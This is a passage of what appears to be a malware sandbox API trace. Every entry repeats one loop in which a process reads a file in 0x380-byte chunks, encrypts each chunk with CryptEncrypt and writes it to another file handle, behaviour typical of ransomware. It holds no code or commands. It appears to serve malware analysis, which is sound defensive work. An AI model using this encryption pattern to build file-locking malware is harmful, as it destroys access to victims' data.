nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.013] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.014] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.015] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.016] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.018] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.019] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.020] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.020] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.020] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.020] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.020] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.021] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.021] WriteFile (in: hFile=0x5d3c, 